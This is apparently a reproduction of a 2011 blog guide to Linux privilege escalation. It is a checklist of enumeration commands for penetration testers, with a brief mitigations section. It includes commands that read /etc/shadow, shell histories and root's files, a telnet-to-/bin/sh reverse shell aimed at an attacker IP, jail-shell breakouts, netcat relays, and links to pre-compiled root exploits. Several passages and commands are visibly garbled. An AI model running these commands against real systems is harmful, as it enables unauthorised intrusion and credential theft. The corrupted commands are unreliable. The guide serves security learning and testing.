

Basic Linux Privilege Escalation

Before starting, I would like to point out - I'm no expert. As far as I know, there isn't a "magic" answer, in this huge area. This is simply my finding, typed up, to be shared (my <u>starting point</u>). Below is a mixture of commands to do the same thing, to look at things in a different place or just a different light. I know there more "things" to look for. It's just a basic & rough guide. Not every command will work for each system as Linux varies so much. "It" will not jump off the screen - you've to hum for that "little thing" as "the devil is in the detail".

Enumeration is the key.

(Linux) privilege escalation is all about:

- Collect Enumeration, more enumeration and some more enumeration.
 Process Sort through data, analyse and prioritisation.
 Search Know what to search for and where to find the exploit code.
 Adapt Customize the exploit, so it fits. Not every exploit work for every system "out of the box".
 Try Ger ready for floss of Ji raid and error.

Operating System

What's the distribution type? What version?

What's the kernel version? Is it 64-bit?

```
1 cat /proc/version
2 uname -a
3 uname -mrs
4 rpm -q kernel
5 dmesg | grep Linux
6 ls /boot | grep vmlinuz-
```

What can be learnt from the environmental variables?

Is there a printer?

1 lostat -a

Applications & Services

What services are running? Which service has which user privilege?

```
1 ps aux
2 ps -ef
3 top
4 cat /etc/services
```

Which service(s) are been running by root? Of these services, which are vulnerable - it's worth a double check!

What applications are installed? What version are they? Are they currently running?

```
1 ls -alh /usr/bin/
2 ls -alh /sbin/
3 dpkg -l
4 rpm -qa
5 ls -alh /var/cache/apt/archives0
6 ls -alh /var/cache/yum/
```

Any of the service(s) settings misconfigured? Are any (vulnerable) plugins attached?

What jobs are scheduled?

Any plain text usernames and/or passwords?

```
1 grep -i user [filename]
2 grep -i pass [filename]
3 grep - 0 5 "password" [filename]
4 find . -name "*.php" -print0 | xargs -0 grep -i -n "var $password"  # Joomla
```

Communications & Networking

What NIC(s) does the system have? Is it connected to another network?

```
1/sbin/ifconfig -a
2 cat /etc/network/interfaces
3 cat /etc/sysconfig/network
 What are the network configuration settings? What can you find out about this network? DHCP server? DNS server? Gateway?
                   1 cat /etc/resolv.conf
2 cat /etc/sysconfig/network
3 cat /etc/networks
4 iptables -L
5 hostname
6 dnsdomainname
  What other users & hosts are communicating with the system?
 Whats cached? IP and/or MAC addresses
                   1 arp -e
2 route
3 /sbin/route -nee
Is packet sniffing possible? What can be seen? Listen to live traffic
                    1 tcpdump tcp dst 192.168.1.7 80 and tcp dst 10.2.2.222 21
Note: tcpdump tcp dst [ip] [port] and tcp dst [ip] [port]
Have you got a shell? Can you interact with the system?
                    1nc -lvp 4444  # Attacker. Input (Commands)
2nc -lvp 4445  # Attacker. Ouput (Results)
3 telnet [atackers ip] 44444 | /bin/sh [ ] [local ip] 44445  # On the targets system. Use the attackers IP!
Note: http://lanmaster53.com/2011/05/7-linux-shells-using-built-in-tools/
Is port forwarding possible? Redirect and interact with traffic from another view
Note: http://www.boutell.com/rinetd/
{\color{red}Note:} \ \underline{http://downloadcenter.mcafee.com/products/tools/foundstone/fpipe2} \ 1.zip
 Note: FPipe.exe -l [local port] -r [remote port] -s [local port] [local IP]
                    1 FPipe.exe -1 80 -r 80 -s 80 192.168.1.7
Note: ssh\ \hbox{-}[L/R]\ [local\ port]\hbox{:}[remote\ ip]\hbox{:}[remote\ port]\ [local\ user] @[local\ ip]
                    1 ssh -L 8080:127.0.0.1:80 root@192.168.1.7  # Local Port
2 ssh -R 8080:127.0.0.1:80 root@192.168.1.7  # Remote Port
 Note: mknod\ backpipe\ p\ ;\ nc\ -l\ -p\ [remote\ port]\ \leq\ backpipe\ |\ nc\ [local\ IP]\ [local\ port]\ \geq\ backpipe\ |\ nc\ [local\ IP]\ [local\ port]\ >\ backpipe\ |\ nc\ [local\ port]\ >\ backpipe\ |\
                      1mknod backpipe p ; nc -1 -p 8880 < backpipe | nc 10.1.1.251 80 >backpipe  # Port Relay
2mknod backpipe p ; nc -1 -p 8880 0 & - backpipe | tee -a inflow | nc localhost 80 | tee -a outflow 1>backpipe  # Proxy (Port 80 to 8880)
3mknod backpipe p ; nc -1 -p 8880 0 & < backpipe | tee -a inflow | nc localhost 80 | tee -a outflow & 1>backpipe  # Proxy monitor (Port 80 to 8880)
                      1 ssh -D 127.0.0.1:9050 -N [username]@[ip]
2 proxychains ifconfig
Confidential Information & Users
 Who are you? Who is logged in? Who has been logged in? Who else is there? Who can do what?
                    11d 2 who 2
What sensitive files can be found?
                   1 cat /etc/passwd
2 cat /etc/group
3 cat /etc/shadow
4 ls -alh /var/mail/
 Anything "interesting" in the home directorie(s)? If it's possible to access
                    1 ls -ahlR /root/
2 ls -ahlR /home/
Are there any passwords in; scripts, databases, configuration files or log files? Default paths and locations for passwords
 What has the user being doing? Is there any password in plain text? What have they been edting?
                      1 cat ~/.bash_history
2 cat ~/.nano_history
3 cat ~/.atftp_history
4 cat ~/.mysql_history
5 cat ~/.php_history
 What user information can be found?
```

1 cat ~/.bashrc

```
Can private-key information be found?
File Systems
 Which configuration files can be written in /etc/? Able to reconfigure a service?
                11s -aRl /etc/ | awk '$1 ~ /^.*w.*/' 2>/dev/null # Anyone 21s -aRl /etc/ | awk '$1 ~ /^.w/' 2>/dev/null # Owner 31s -aRl /etc/ | awk '$1 ~ /^...w/' 2>/dev/null # Group 41s -aRl /etc/ | awk '$1 ~ /w.$/' 2>/dev/null # Other
                6 find /etc/ -readable -type f 2>/dev/null # Anyone
7 find /etc/ -readable -type f -maxdepth i 2>/dev/null # Anyone
 What can be found in /var/?
 Any settings/files (hidden) on website? Any settings file with database information?
Is there anything in the log file(s) (Could help with "Local File Includes"!)
                 40 Note: auth.log, boot, btmp, daemon.log, debug, dmesg, kern.log, mail.info, mail.log, mail.warn, messages, syslog, udev, wtmp
 Note: http://www.thegeekstuff.com/2011/08/linux-var-log-files/
If commands are limited, you break out of the "jail" shell?
                1 python -c 'import pty;pty.spawn("/bin/bash")'
2 echo os.system('/bin/bash')
3 /bin/sh -i
 How are file-systems mounted?
Are there any unmounted file-systems?
                1 cat /etc/fstab
  What "Advanced Linux File Permissions" are used? Sticky bits, SUID & GUID
                 4
Stind / sperm -ges -o -perm -ues -type f 2-/dev/null # SGID or SUID
Stind / sperm -ges -o -perm -ues -type f 2-/dev/null # SGID or SUID
Stor i in 'locate -r "bins"; do find $i \( \cdot \cdot
                 / 8 # find starting at root (/), SGIO or SUID, not Symbolic links, only 3 folders deep, list with more detail and hide any errors (e.g. permission denied) 9 find / -perm -g=s -o -perm -4000 ! -type l -maxdepth 3 -exec ls -ld {} \; 2>/dev/null
 Where can written to and executed from? A few 'common' places: /tmp, /var/tmp, /dev/shm
                 1 find / -writable -type d 2>/dev/null # world-writeable folders
2 find / -perm -222 -type d 2>/dev/null # world-writeable folders
3 find / -perm -o w -type d 2>/dev/null # world-writeable folders
```

4 5 find / -perm -o x -type d 2>/dev/null # world-executable folders

6 7 find / \(-perm -o w -perm -o x \) -type d 2>/dev/null # world-writeable & executable folders

Any "problem" files? Word-writeable, "nobody" files

1 find / -xdev -type d \(-perm -0002 -a ! -perm -1000 \) -print # world-writeable files 2 find /dir -xdev \(-nouser -o -nogroup \) -print # Noowner files

Preparation & Finding Exploit Code

What development tools/languages are installed/supported?

How can files be uploaded?

Finding exploit code

http://www.exploit-db.com

http://1337day.com

http://www.securiteam.com

http://www.exploitsearch.net

http://securityreason.com

http://seclists.org/fulldisclosure/

http://www.google.com

Finding more information regarding the exploit

http://www.cvedetails.com

http://packetstormsecurity.org/files/cve/[CVE]

http://cve.mitre.org/cgi-bin/cvename.cgi?name=[CVE]

http://www.vulnview.com/cve-details.php?cvename=[CVE]

(Quick) "Common" exploits. Warning. Pre-compiled binaries files. Use at your own risk

http://web.archive.org/web/20111118031158/http://tarantula.by.ru/localroot/

http://www.kecepatan.66ghz.com/file/local-root-exploit-priv9/

Mitigations

Is any of the above information easy to find?

Try doing it! Setup a cron job which automates script(s) and/or 3rd party products

Is the system fully patched?

 $Kernel, operating \ system, \ all \ applications, \ their \ plugins \ and \ web \ services$

1 apt-get update && apt-get upgrade

Are services running with the minimum level of privileges required?

For example, do you need to run MySQL as root?

Scripts Can any of this be automated?!

http://pentestmonkey.net/tools/unix-privesc-check/

http://labs.portcullis.co.uk/application/enum4linux/

http://bastille-linux.sourceforge.net

Other (quick) guides & Links

Enumeration

http://www.0daysecurity.com/penetration-testing/enumeration.html

http://www.microloft.co.uk/hacking/hacking3.htm

http://jon.oberheide.org/files/stackjacking-infiltrate11.pdf

 $\underline{http://pentest.cryptocity.net/files/operations/2009/post_exploitation_fall09.pdf}$

http://insidetrust.blogspot.com/2011/04/quick-guide-to-linux-privilege.html

Posted by g0tmi1kAug 2nd, 2011 12:00 am bypassing, commands, privilege escalation

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